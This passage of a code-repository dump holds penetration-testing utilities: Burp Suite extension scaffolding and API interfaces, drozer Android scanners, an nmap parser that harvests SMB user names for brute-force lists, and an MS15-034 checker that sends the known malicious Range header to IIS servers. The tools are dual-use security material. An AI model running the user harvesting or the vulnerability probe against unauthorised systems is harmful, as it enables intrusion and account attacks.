exists\n" 17 | exit 2 18 | } 19 | 20 | [[ -e $apifile ]] || { 21 | echo -e "\n\t[!] ERROR: Cannot find $apifile in $PWD" 22 | echo -e "\t[!] Download it from the following URL to this very same folder\n" 23 | echo -e "\t$apifileurl\n" 24 | exit 3 25 | } 26 | 27 | echo "[*] Creating extension structure for $dirname" 28 | 29 | mkdir "$dirname" 30 | "$(which unzip)" "$apifile" -d "$dirname/" 31 | cd $dirname 32 | 33 | case "$2" in 34 | 35 | ant) 36 | echo "[*] Using ANT build process" 37 | mkdir src bin dist 38 | mv burp/ src/ 39 | touch "src/burp/BurpExtender.java" 40 | touch "src/${dirname}.java" 41 | cat > $antfile << _EOF 42 | 43 | 44 | 45 | 46 | 47 | 48 | _EOF 49 | echo "[*] To build the jar file enter $dirname and execute \"ant\"" 50 | echo "[*] Now edit $dirname/burp/BurpExtender.java and src/${dirname}.java" 51 | ;; 52 | 53 | makefile) 54 | echo "[*] Using old Makefile build process" 55 | touch "BurpExtender.java" 56 | cat > "$makefile" << _EOF 57 | all: 58 | @echo "[*] Compiling burp extension $dirname" 59 | @javac -d burp/ BurpExtender.java 60 | @echo "[*] Creating $jarfile" 61 | @jar -cf $jarfile burp/*.class 62 | @echo "[*] Execute \"java -cp $jarfile:burpsuite_pro.jar burp.StartBurp\" to start burp" 63 | clean: 64 | @echo "[*] Cleaning $dirname" 65 | @rm burp/*.class 66 | @rm $jarfile 67 | _EOF 68 | echo "[*] To build the jar file enter $dirname and execute \"make\"" 69 | echo "[*] Now edit $dirname/BurpExtender.java" 70 | ;; 71 | *) 72 | rm -rf "$dirname" 73 | printf "\n\tUsage: $0 \n\n" 74 | exit 2 75 | ;; 76 | esac 77 | 78 | 79 | exit 0 80 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IScanQueueItem.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScanQueueItem.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to retrieve details of items in the Burp Scanner 14 | * active scan queue. Extensions can obtain references to scan queue items by 15 | * calling 16 | * IBurpExtenderCallbacks.doActiveScan(). 17 | */ 18 | public interface IScanQueueItem 19 | { 20 | /** 21 | * This method returns a description of the status of the scan queue item. 22 | * 23 | * @return A description of the status of the scan queue item. 24 | */ 25 | String getStatus(); 26 | 27 | /** 28 | * This method returns an indication of the percentage completed for the 29 | * scan queue item. 30 | * 31 | * @return An indication of the percentage completed for the scan queue 32 | * item. 33 | */ 34 | byte getPercentageComplete(); 35 | 36 | /** 37 | * This method returns the number of requests that have been made for the 38 | * scan queue item. 39 | * 40 | * @return The number of requests that have been made for the scan queue 41 | * item. 42 | */ 43 | int getNumRequests(); 44 | 45 | /** 46 | * This method returns the number of network errors that have occurred for 47 | * the scan queue item. 48 | * 49 | * @return The number of network errors that have occurred for the scan 50 | * queue item. 51 | */ 52 | int getNumErrors(); 53 | 54 | /** 55 | * This method returns the number of attack insertion points being used for 56 | * the scan queue item. 57 | * 58 | * @return The number of attack insertion points being used for the scan 59 | * queue item. 60 | */ 61 | int getNumInsertionPoints(); 62 | 63 | /** 64 | * This method allows the scan queue item to be canceled. 65 | */ 66 | void cancel(); 67 | 68 | /** 69 | * This method returns details of the issues generated for the scan queue 70 | * item. Note: different items within the scan queue may contain 71 | * duplicated versions of the same issues - for example, if the same request 72 | * has been scanned multiple times. Duplicated issues are consolidated in 73 | * the main view of scan results. Extensions can register an 74 | * IScannerListener to get details only of unique, newly 75 | * discovered Scanner issues post-consolidation. 76 | * 77 | * @return Details of the issues generated for the scan queue item. 78 | */ 79 | IScanIssue[] getIssues(); 80 | } 81 | -------------------------------------------------------------------------------- /nmap/vulnmap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | pwnmaps.py 5 | Parse/Wrestle nmap Scripts 6 | 7 | Parses nmap XML NSE script smb-enum-users and prints the users found to stdout. 8 | Should be handy for generating user lists for further (brute force) attacks, to 9 | generate such a list one could for example use sort to make sure we only have 10 | unique user names: $ sort --unique output.txt > unique-users.txt 11 | 12 | Created on Oct 9, 2010 13 | @author: Carsten Maartmann-Moe 14 | http://www.breaknenter.org/2010/10/pwnmap-a-tool-to-parse-nmap-nse-output-into-something-useful/ 15 | """ 16 | import xml.dom.minidom 17 | # import locale 18 | import sys 19 | import getopt 20 | 21 | # language, output_encoding = locale.getdefaultlocale() 22 | verbose = False 23 | 24 | def main(argv): 25 | doc = "" 26 | try: 27 | opts, args = getopt.getopt(argv, "hv", ["help", "verbose"]) 28 | except getopt.GetoptError as err: 29 | print(err) 30 | usage() 31 | sys.exit(2) 32 | for opt, arg in opts: 33 | if opt in ("-h", "--help"): 34 | usage() 35 | sys.exit() 36 | elif opt in ("-v", "--verbose"): 37 | global verbose 38 | verbose = True 39 | 40 | if len(args) < 1: # Print usage if no arguments are given 41 | usage() 42 | 43 | input_files = args # The remainder of arguments are treated like input files 44 | for i in input_files: 45 | try: 46 | doc = xml.dom.minidom.parse(i) 47 | except: 48 | print("[!] Invalid XML, giving up...") 49 | parse_nmap(doc) 50 | 51 | def parse_nmap(doc): 52 | usernames = [] 53 | 54 | for host in doc.getElementsByTagName("host"): 55 | ip = name = output = "" 56 | 57 | # Get host IPv4 address (and potentially IPv6 and mac as well) 58 | addresses = host.getElementsByTagName("address") 59 | for address in addresses: 60 | ip = address.getAttribute("addr") 61 | 62 | # Get host name 63 | hostnames = host.getElementsByTagName("hostname") 64 | for hostname in hostnames: 65 | name = hostname.getAttribute("name") 66 | 67 | scripts = host.getElementsByTagName("script") 68 | for script in scripts: 69 | output = script.getAttribute("output") #.encode(output_encoding) 70 | usernames = output.split(',') 71 | 72 | if(verbose): 73 | print("[*] Users harvested from " + ip + " (" + name + "):") 74 | 75 | for username in usernames: 76 | print(username.strip()) 77 | 78 | def usage(): 79 | print("""Usage: ./pwnmaps.py [OPTIONS] results.xml 80 | 81 | The input file should be generated using nmap with a similar syntax: 82 | nmap --script=smb-enum-users -oX results.xml 127.0.0.17 83 | 84 | -h/--help: Displays this message 85 | -v/--verbose: Verbose mode""") 86 | 87 | if __name__ == "__main__": 88 | main(sys.argv[1:]) 89 | -------------------------------------------------------------------------------- /burpsuite/burp_item2appendix.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # jue ago 28 19:27:37 CEST 2014 3 | # devnull@libcrack.so 4 | # 5 | # Reads an Burp Suite issues XML file and 6 | # print all the issues, payloads and details 7 | # based on previous work by Pablo Catalina 8 | # 9 | 10 | 11 | import sys 12 | import re 13 | from base64 import b64decode 14 | from xml.dom import minidom 15 | import html2text 16 | import urllib 17 | 18 | if len(sys.argv) != 2: 19 | print ("\n\tUsage: %s \n" % sys.argv[0]) 20 | sys.exit(1) 21 | 22 | filename = sys.argv[1] 23 | xmldoc = minidom.parse(filename) 24 | idict={} 25 | 26 | try: 27 | itemlist = xmldoc.getElementsByTagName('item') 28 | except Exception as e: 29 | raise Exception("%s does not contain items" % filename) 30 | 31 | for item in itemlist: 32 | 33 | tmpitem = {} 34 | 35 | tmpitem['url'] = item.getElementsByTagName('url')[0].firstChild.data 36 | tmpitem['host'] = item.getElementsByTagName('host')[0].firstChild.data 37 | #tmpitem['request'] = b64decode(item.getElementsByTagName('request')[0].firstChild.data) 38 | #tmpitem['response'] = b64decode(item.getElementsByTagName('response')[0].firstChild.data) 39 | #tmpitem['referer'] = re.search(r"Referer:\s*(.*)\n", tmpitem['request']).groups()[0] 40 | 41 | host = tmpitem['host'] 42 | 43 | if host not in idict.keys(): 44 | idict[host]=tmpitem 45 | else: 46 | print ("[ERROR] host %s already added" % (host)) 47 | 48 | number = 0 49 | for host in sorted(idict.keys()): 50 | print ("-------------------------------------[ HTTP Request Snip ]-------------------------------------") 51 | print (" Instance number %s" % number) 52 | print (" Host: %s" % idict[host]['host']) 53 | print (" URL: %s" % urllib.unquote_plus(idict[host]['url'])) 54 | #print (" Referer: %s" % idict[host]['referer']) 55 | print ("-------------------------------------[ HTTP Request Snip ]-------------------------------------") 56 | print ("\n") 57 | #print ("=============================================================================================") 58 | #print ("\n[*] HTTP Request to %s :\n" % url) 59 | ##print ("") 60 | #print ("-----------------------------------[ SNIP STARTS ]-----------------------------------") 61 | #print ("%s" % idict[host][''][0],) 62 | #print ("------------------------------------[ SNIP ENDS ]------------------------------------") 63 | ##print ("") 64 | #print 65 | #print ("[*] HTTP Response to %s :" % url) 66 | #print 67 | ##print ("") 68 | #print ("-----------------------------------[ SNIP STARTS ]-----------------------------------") 69 | #print ("%s" % idict[url][param][1],) 70 | #print ("------------------------------------[ SNIP ENDS ]------------------------------------") 71 | ##print ("") 72 | #print ("\n[*] Issue detail :\n") 73 | #print ("%s\n\n" % idict[url][param][2]) 74 | number = number + 1 75 | 76 | -------------------------------------------------------------------------------- /drozer/secure_random.py: -------------------------------------------------------------------------------- 1 | from pydiesel.reflection import ReflectionException 2 | 3 | from drozer.modules import common, Module 4 | 5 | class SecureRandom(Module, common.FileSystem, common.PackageManager, common.Provider, common.Strings, common.ZipFile): 6 | 7 | name = "SecureRandom Check" 8 | description = """ 9 | Finds applications that make use of java.security.SecureRandom as a source of random numbers. 10 | 11 | It was identified that on some versions of Android the SecureRandom random number generator did not correctly seed the underlying PRNG, which could cause predictable sequences of numbers to be generated. 12 | 13 | See: http://android-developers.blogspot.co.uk/2013/08/some-securerandom-thoughts.html 14 | """ 15 | examples = "" 16 | author = "MWR InfoSecurity (@mwrlabs)" 17 | date = "2013-08-13" 18 | license = "BSD (3 clause)" 19 | path = ["scanner", "misc"] 20 | permissions = ["com.mwr.dz.permissions.GET_CONTEXT"] 21 | 22 | def add_arguments(self, parser): 23 | parser.add_argument("-a", "--package", "--uri", dest="package_or_uri", help="specify a package, or content uri to search", metavar="") 24 | parser.add_argument("-v", "--verbose", action="store_true", help="enable verbose mode") 25 | 26 | def execute(self, arguments): 27 | if arguments.package_or_uri != None: 28 | self.check_package(arguments.package_or_uri,arguments) 29 | else: 30 | for package in self.packageManager().getPackages(common.PackageManager.GET_PERMISSIONS): 31 | try: 32 | self.check_package(package.packageName, arguments) 33 | except Exception, e: 34 | print str(e) 35 | 36 | 37 | def check_package(self, package, arguments): 38 | self.deleteFile("/".join([self.cacheDir(), "classes.dex"])) 39 | 40 | for path in self.packageManager().getSourcePaths(package): 41 | strings = [] 42 | if ".apk" in path: 43 | dex_file = self.extractFromZip("classes.dex", path, self.cacheDir()) 44 | if dex_file != None: 45 | strings = self.getStrings(dex_file.getAbsolutePath()) 46 | 47 | dex_file.delete() 48 | strings += self.getStrings(path.replace(".apk", ".odex")) 49 | elif (".odex" in path): 50 | strings = self.getStrings(path) 51 | else: 52 | continue 53 | 54 | securerandom = "false" 55 | if "java.security.SecureRandom" in str(strings) or "Ljava/security/SecureRandom" in str(strings): 56 | securerandom = "true" 57 | 58 | if securerandom == "true": 59 | self.stdout.write("[color red]%s uses SecureRandom[/color]\n" % package) 60 | elif arguments.verbose: 61 | self.stdout.write("[color green]%s doesn't use SecureRandom[/color]\n" % package) 62 | 63 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IRequestInfo.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IRequestInfo.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.net.URL; 13 | import java.util.List; 14 | 15 | /** 16 | * This interface is used to retrieve key details about an HTTP request. 17 | * Extensions can obtain an 18 | * IRequestInfo object for a given request by calling 19 | * IExtensionHelpers.analyzeRequest(). 20 | */ 21 | public interface IRequestInfo 22 | { 23 | /** 24 | * Used to indicate that there is no content. 25 | */ 26 | static final byte CONTENT_TYPE_NONE = 0; 27 | /** 28 | * Used to indicate URL-encoded content. 29 | */ 30 | static final byte CONTENT_TYPE_URL_ENCODED = 1; 31 | /** 32 | * Used to indicate multi-part content. 33 | */ 34 | static final byte CONTENT_TYPE_MULTIPART = 2; 35 | /** 36 | * Used to indicate XML content. 37 | */ 38 | static final byte CONTENT_TYPE_XML = 3; 39 | /** 40 | * Used to indicate JSON content. 41 | */ 42 | static final byte CONTENT_TYPE_JSON = 4; 43 | /** 44 | * Used to indicate AMF content. 45 | */ 46 | static final byte CONTENT_TYPE_AMF = 5; 47 | /** 48 | * Used to indicate unknown content. 49 | */ 50 | static final byte CONTENT_TYPE_UNKNOWN = -1; 51 | 52 | /** 53 | * This method is used to obtain the HTTP method used in the request. 54 | * 55 | * @return The HTTP method used in the request. 56 | */ 57 | String getMethod(); 58 | 59 | /** 60 | * This method is used to obtain the URL in the request. 61 | * 62 | * @return The URL in the request. 63 | */ 64 | URL getUrl(); 65 | 66 | /** 67 | * This method is used to obtain the HTTP headers contained in the request. 68 | * 69 | * @return The HTTP headers contained in the request. 70 | */ 71 | List getHeaders(); 72 | 73 | /** 74 | * This method is used to obtain the parameters contained in the request. 75 | * 76 | * @return The parameters contained in the request. 77 | */ 78 | List getParameters(); 79 | 80 | /** 81 | * This method is used to obtain the offset within the request where the 82 | * message body begins. 83 | * 84 | * @return The offset within the request where the message body begins. 85 | */ 86 | int getBodyOffset(); 87 | 88 | /** 89 | * This method is used to obtain the content type of the message body. 90 | * 91 | * @return An indication of the content type of the message body. Available 92 | * types are defined within this interface. 93 | */ 94 | byte getContentType(); 95 | } 96 | -------------------------------------------------------------------------------- /burpsuite/burp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # devnull@libcrack.so 4 | # 5 | # vie nov 8 08:45:35 CET 2013 6 | # mar ene 21 23:14:46 CET 2014 7 | 8 | ## TODO REFs: ~/.java/.userPrefs/burp/prefs.xml 9 | ## ~/.java/.userPrefs $ grep burp burp/prefs.xml 10 | ## 11 | ## 12 | ## 13 | ## 14 | 15 | java="$(which java)" 16 | version="$($java -version 2>&1 | head -1 | cut -f2 -d\")" 17 | myself="$(realpath ${0#-*})" 18 | workdir="$(dirname $myself)" 19 | 20 | # ---------------------------------------------------- 21 | # MaxPerm sets the PermGen heap which is separate and 22 | # in addition to the main heap space set with Xmx 23 | # Its a good idea to assign the same valie for 24 | # Xms and Xmx 25 | # ---------------------------------------------------- 26 | # -XX:+AggressiveHeap # heap allocator tunning 27 | # -Xms3072M # initial heap space 28 | # -Xmx3072M # maximum heap space 29 | # -XX:PermSize=1024M # initial permanent space 30 | # -XX:MaxPermSize=1024M # maximum permanent space 31 | 32 | RAM="4096" 33 | let PRAM="${RAM}/2" 34 | JFLAGS="-Xms${RAM}M -Xmx${RAM}M -XX:PermSize=${PRAM}M -XX:MaxPermSize=$((PRAM*2))M -XX:+AggressiveHeap" 35 | #JFLAGS="-Xmx${RAM}M -Xms${RAM}M -XX:+AggressiveHeap -XX:MaxPermSize=${PRAM}M" 36 | JPROXY1="-Dhttp.proxyHost=127.0.0.1 -Dhttp.proxyPort=9090" 37 | JPROXY2="-Dhttp.nonProxyHosts=\"localhost|127.0.0.1|10.*.*.*|*.foo.com\"" 38 | JDEBUG="-Xdebug -agentlib:jdwp=transport=dt_socket,server=y,address=8000,suspend=n" 39 | HEADLESS="-Djava.awt.headless=true" 40 | 41 | # PermGemSpace does not exist in Java 1.8 42 | [[ $version =~ 1.8 ]] \ 43 | && JFLAGS="-Xms${RAM}M -Xmx${RAM}M -XX:+AggressiveHeap" 44 | 45 | # ---- BURP PRO --------------------------------- 46 | cd $workdir 47 | burpjarpro=$(ls burpsuite_pro*.jar|tail -1) 48 | burpjarfree=$(ls burpsuite_free*.jar|tail -1) 49 | burpjar="null.jar" 50 | args= 51 | 52 | echo 53 | echo "[*] Starting Burp Suite" 54 | echo "------------------------" 55 | 56 | case "$1" in 57 | debug) 58 | echo " >> DEBUG mode selected" 59 | JFLAGS="$JFLAGS $JDEBUG" 60 | ;; 61 | free) 62 | echo " >> burp free selected" 63 | burpjar="$burpjarfree" 64 | ;; 65 | pro) 66 | echo " >> burp pro selected" 67 | burpjar="$burpjarpro" 68 | ;; 69 | *) 70 | echo " >> burp pro auto selected" 71 | burpjar="$burpjarpro" 72 | ;; 73 | esac 74 | 75 | [[ -e $burpjar ]] || { 76 | echo " >> ERROR: cannot locate burp jar file" ; echo 77 | exit 1 78 | } 79 | 80 | args="${JFLAGS} -jar ${burpjar}" 81 | 82 | echo " >> java version=${version}" 83 | echo " >> java options=${args}" 84 | echo " >> burp cwd=${workdir}" 85 | echo " >> burp jar=${burpjar}" 86 | echo 87 | 88 | ${java} ${args} & 89 | 90 | exit $? 91 | -------------------------------------------------------------------------------- /ms15-034/ms15-034.c: -------------------------------------------------------------------------------- 1 | /* 2 | UNTESTED - MS15-034 Checker 3 | 4 | THE BUG: 5 | 6 | 8a8b2112 56 push esi 7 | 8a8b2113 6a00 push 0 8 | 8a8b2115 2bc7 sub eax,edi 9 | 8a8b2117 6a01 push 1 10 | 8a8b2119 1bca sbb ecx,edx 11 | 8a8b211b 51 push ecx 12 | 8a8b211c 50 push eax 13 | 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here 14 | 15 | ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4 16 | 17 | BY: john.b.hale@gmai.com 18 | Twitter: @rhcp011235 19 | */ 20 | 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | 32 | int connect_to_server(char *ip, unsigned short int port) 33 | { 34 | int sockfd = 0, n = 0; 35 | 36 | struct sockaddr_in serv_addr; 37 | struct hostent *server; 38 | 39 | if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ 40 | printf("\n Error : Could not create socket \n"); 41 | return 1; 42 | } 43 | 44 | memset(&serv_addr, '0', sizeof(serv_addr)); 45 | serv_addr.sin_family = AF_INET; 46 | serv_addr.sin_port = htons(port); 47 | 48 | if(inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0) { 49 | printf("\n inet_pton error occured\n"); 50 | return 1; 51 | } 52 | 53 | if(connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0){ 54 | printf("\n Error : Connect Failed \n"); 55 | return 1; 56 | } 57 | 58 | return sockfd; 59 | } 60 | 61 | 62 | int main(int argc, char *argv[]) 63 | { 64 | int n = 0; 65 | int sockfd; 66 | char recv_buff[1024]; 67 | 68 | char request[] = "GET / HTTP/1.0\r\n\r\n"; 69 | char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"; 70 | 71 | 72 | if(argc != 3) 73 | { 74 | printf("\n Usage: %s \n\n",argv[0]); 75 | return 1; 76 | } 77 | 78 | char *host = argv[1]; 79 | unsigned short int port = atoi(argv[2]); 80 | 81 | printf("[*] Audit Started\n"); 82 | sockfd = connect_to_server(host,port); 83 | write(sockfd, request, strlen(request)); 84 | read(sockfd, recv_buff, sizeof(recv_buff)-1); 85 | 86 | if (!strstr(recv_buff,"Microsoft")){ 87 | printf("[*] NOT IIS\n"); 88 | exit(1); 89 | } 90 | 91 | sockfd = connect_to_server(host,port); 92 | write(sockfd, request1, strlen(request1)); 93 | read(sockfd, recv_buff, sizeof(recv_buff)-1); 94 | 95 | if (strstr(recv_buff,"Requested Range Not Satisfiable")){ 96 | printf("[!!] Looks VULN\n"); 97 | exit(1); 98 | } else if(strstr(recv_buff,"The request has an invalid header name")) { 99 | printf("[*] Looks Patched\n"); 100 | } else { 101 | printf("[*] Unexpected response, cannot discern patch status\n"); 102 | } 103 | 104 | } 105 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/ITextEditor.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)ITextEditor.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.awt.Component; 13 | 14 | /** 15 | * This interface is used to provide extensions with an instance of Burp's raw 16 | * text editor, for the extension to use in its own UI. Extensions should call 17 | * IBurpExtenderCallbacks.createTextEditor() to obtain an instance 18 | * of this interface. 19 | */ 20 | public interface ITextEditor 21 | { 22 | /** 23 | * This method returns the UI component of the editor, for extensions to add 24 | * to their own UI. 25 | * 26 | * @return The UI component of the editor. 27 | */ 28 | Component getComponent(); 29 | 30 | /** 31 | * This method is used to control whether the editor is currently editable. 32 | * This status can be toggled on and off as required. 33 | * 34 | * @param editable Indicates whether the editor should be currently 35 | * editable. 36 | */ 37 | void setEditable(boolean editable); 38 | 39 | /** 40 | * This method is used to update the currently displayed text in the editor. 41 | * 42 | * @param text The text to be displayed. 43 | */ 44 | void setText(byte[] text); 45 | 46 | /** 47 | * This method is used to retrieve the currently displayed text. 48 | * 49 | * @return The currently displayed text. 50 | */ 51 | byte[] getText(); 52 | 53 | /** 54 | * This method is used to determine whether the user has modified the 55 | * contents of the editor. 56 | * 57 | * @return An indication of whether the user has modified the contents of 58 | * the editor since the last call to 59 | * setText(). 60 | */ 61 | boolean isTextModified(); 62 | 63 | /** 64 | * This method is used to obtain the currently selected text. 65 | * 66 | * @return The currently selected text, or 67 | * null if the user has not made any selection. 68 | */ 69 | byte[] getSelectedText(); 70 | 71 | /** 72 | * This method can be used to retrieve the bounds of the user's selection 73 | * into the displayed text, if applicable. 74 | * 75 | * @return An int[2] array containing the start and end offsets of the 76 | * user's selection within the displayed text. If the user has not made any 77 | * selection in the current message, both offsets indicate the position of 78 | * the caret within the editor. 79 | */ 80 | int[] getSelectionBounds(); 81 | 82 | /** 83 | * This method is used to update the search expression that is shown in the 84 | * search bar below the editor. The editor will automatically highlight any 85 | * regions of the displayed text that match the search expression. 86 | * 87 | * @param expression The search expression. 88 | */ 89 | void setSearchExpression(String expression); 90 | } 91 | -------------------------------------------------------------------------------- /drozer/object_input_stream.py: -------------------------------------------------------------------------------- 1 | from pydiesel.reflection import ReflectionException 2 | 3 | from drozer.modules import common, Module 4 | 5 | class ObjectInputStream(Module, common.FileSystem, common.PackageManager, common.Provider, common.Strings, common.ZipFile): 6 | 7 | name = "ObjectInputStream Check" 8 | description = """ 9 | Finds applications that make use of java.io.ObjectInputStream (CVE-2014-7911: Android <5.0 Privilege Escalation) 10 | 11 | It was identified that on Android <5.0 java.io.ObjectInputStream did not check whether the Object that is being 12 | deserialized is actually serializable. This means that when ObjectInputStream is used on untrusted inputs, an 13 | attacker can cause an instance of any class with a non-private parameterless constructor to be created 14 | 15 | See: 16 | http://seclists.org/fulldisclosure/2014/Nov/51 17 | http://researchcenter.paloaltonetworks.com/2015/01/cve-2014-7911-deep-dive-analysis-android-system-service-vulnerability-exploitation/ 18 | """ 19 | examples = "" 20 | author = "/dev/null " 21 | date = "2015-05-13" 22 | license = "BSD (3 clause)" 23 | path = ["scanner", "misc"] 24 | permissions = ["com.mwr.dz.permissions.GET_CONTEXT"] 25 | 26 | def add_arguments(self, parser): 27 | parser.add_argument("-a", "--package", "--uri", dest="package_or_uri", help="specify a package, or content uri to search", metavar="") 28 | parser.add_argument("-v", "--verbose", action="store_true", help="enable verbose mode") 29 | 30 | def execute(self, arguments): 31 | if arguments.package_or_uri != None: 32 | self.check_package(arguments.package_or_uri,arguments) 33 | else: 34 | for package in self.packageManager().getPackages(common.PackageManager.GET_PERMISSIONS): 35 | try: 36 | self.check_package(package.packageName, arguments) 37 | except Exception, e: 38 | print str(e) 39 | 40 | 41 | def check_package(self, package, arguments): 42 | self.deleteFile("/".join([self.cacheDir(), "classes.dex"])) 43 | 44 | for path in self.packageManager().getSourcePaths(package): 45 | strings = [] 46 | if ".apk" in path: 47 | dex_file = self.extractFromZip("classes.dex", path, self.cacheDir()) 48 | if dex_file != None: 49 | strings = self.getStrings(dex_file.getAbsolutePath()) 50 | 51 | dex_file.delete() 52 | strings += self.getStrings(path.replace(".apk", ".odex")) 53 | elif (".odex" in path): 54 | strings = self.getStrings(path) 55 | else: 56 | continue 57 | 58 | object_input_stream = "false" 59 | if "java.io.ObjectInputStream" in str(strings) or "Ljava/io/ObjectInputStream" in str(strings): 60 | object_input_stream = "true" 61 | 62 | if object_input_stream == "true": 63 | self.stdout.write("[color red]%s uses ObjectInputStream[/color]\n" % package) 64 | elif arguments.verbose: 65 | self.stdout.write("[color green]%s doesn't use ObjectInputStream[/color]\n" % package) 66 | 67 | -------------------------------------------------------------------------------- /burpsuite/extensions/RandomUUID.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF-8 -*- 2 | # 3 | # Burp Randon UUID Extension 4 | # /dev/null 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | 19 | import re 20 | import uuid 21 | import string 22 | import random 23 | 24 | from burp import (IBurpExtender, ISessionHandlingAction) 25 | 26 | EXTENSION_NAME = "RandomUUID" 27 | 28 | tokenCharset = string.ascii_letters + string.digits 29 | placeholder = "__RANDOM__" 30 | tokenLength = 8 31 | 32 | if tokenLength != len(placeholder): 33 | raise Exception("tokenLength must match the length of the placeholder") 34 | 35 | def randomString (strmin=16,strmax=None,number=True,alpha=True,special=False): 36 | """ 37 | Returns a random string of len between strmin and strmax 38 | If no strmin len if specified, a random string of 16 chars will be generated 39 | """ 40 | if strmax == None: 41 | strmax = strmin 42 | if strmin > strmax: 43 | raise Exception("strmin cannot be greater than strmax") 44 | especial_chars = ".-_+*" 45 | subset = string.digits 46 | if alpha: subset = subset + string.ascii_letters 47 | if especial: subset = subset + especial_chars 48 | random_iterations = random.randint(strmin,strmax) 49 | random_string = "" 50 | for i in xrange(random_iterations): 51 | # random_char = random.choice(string.ascii_letters + string.digits + especial_chars) 52 | random_char = random.choice(subset) 53 | random_string = random_string + random_char 54 | return random_string 55 | 56 | def randomUUID (): 57 | """ 58 | This method returns an UUID in canonical format XXXXXXXX-XXXX-XXXX-XXXXXXXX 59 | """ 60 | stru = str(uuid.uuid1()) 61 | stru2 = stru[8:] + stru[:8] 62 | u2 = uuid.UUID(stru2) 63 | return str(u2) 64 | #new_uuid = str(uuid.uuid4()) 65 | #return str(uuid.uuid4()) 66 | 67 | class BurpExtender(IBurpExtender, ISessionHandlingAction): 68 | """ 69 | Implementa ISessionHandlingAction 70 | """ 71 | def registerExtenderCallbacks(self, callbacks): 72 | self.callbacks = callbacks 73 | self.helpers = callbacks.getHelpers() 74 | callbacks.setExtensionName(EXTENSION_NAME) 75 | self.callbacks.registerSessionHandlingAction(self) 76 | self.out = callbacks.getStdout() 77 | self.placeholder = re.compile(placeholder) 78 | random.seed() 79 | 80 | def getActionName(self): 81 | return "Random UUID Parameter Insertion" 82 | 83 | def performAction(self, currentRequest, macroItems): 84 | request = self.helpers.bytesToString(currentRequest.getRequest()) 85 | randomToken = "".join([random.choice(tokenCharset) for i in range(tokenLength)]) 86 | result = self.helpers.stringToBytes(self.placeholder.sub(randomToken, request)) 87 | currentRequest.setRequest(result) 88 | 89 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IHttpRequestResponse.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IHttpRequestResponse.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to retrieve and update details about HTTP messages. 14 | * 15 | * Note: The setter methods generally can only be used before the message 16 | * has been processed, and not in read-only contexts. The getter methods 17 | * relating to response details can only be used after the request has been 18 | * issued. 19 | */ 20 | public interface IHttpRequestResponse 21 | { 22 | /** 23 | * This method is used to retrieve the request message. 24 | * 25 | * @return The request message. 26 | */ 27 | byte[] getRequest(); 28 | 29 | /** 30 | * This method is used to update the request message. 31 | * 32 | * @param message The new request message. 33 | */ 34 | void setRequest(byte[] message); 35 | 36 | /** 37 | * This method is used to retrieve the response message. 38 | * 39 | * @return The response message. 40 | */ 41 | byte[] getResponse(); 42 | 43 | /** 44 | * This method is used to update the response message. 45 | * 46 | * @param message The new response message. 47 | */ 48 | void setResponse(byte[] message); 49 | 50 | /** 51 | * This method is used to retrieve the user-annotated comment for this item, 52 | * if applicable. 53 | * 54 | * @return The user-annotated comment for this item, or null if none is set. 55 | */ 56 | String getComment(); 57 | 58 | /** 59 | * This method is used to update the user-annotated comment for this item. 60 | * 61 | * @param comment The comment to be assigned to this item. 62 | */ 63 | void setComment(String comment); 64 | 65 | /** 66 | * This method is used to retrieve the user-annotated highlight for this 67 | * item, if applicable. 68 | * 69 | * @return The user-annotated highlight for this item, or null if none is 70 | * set. 71 | */ 72 | String getHighlight(); 73 | 74 | /** 75 | * This method is used to update the user-annotated highlight for this item. 76 | * 77 | * @param color The highlight color to be assigned to this item. Accepted 78 | * values are: red, orange, yellow, green, cyan, blue, pink, magenta, gray, 79 | * or a null String to clear any existing highlight. 80 | */ 81 | void setHighlight(String color); 82 | 83 | /** 84 | * This 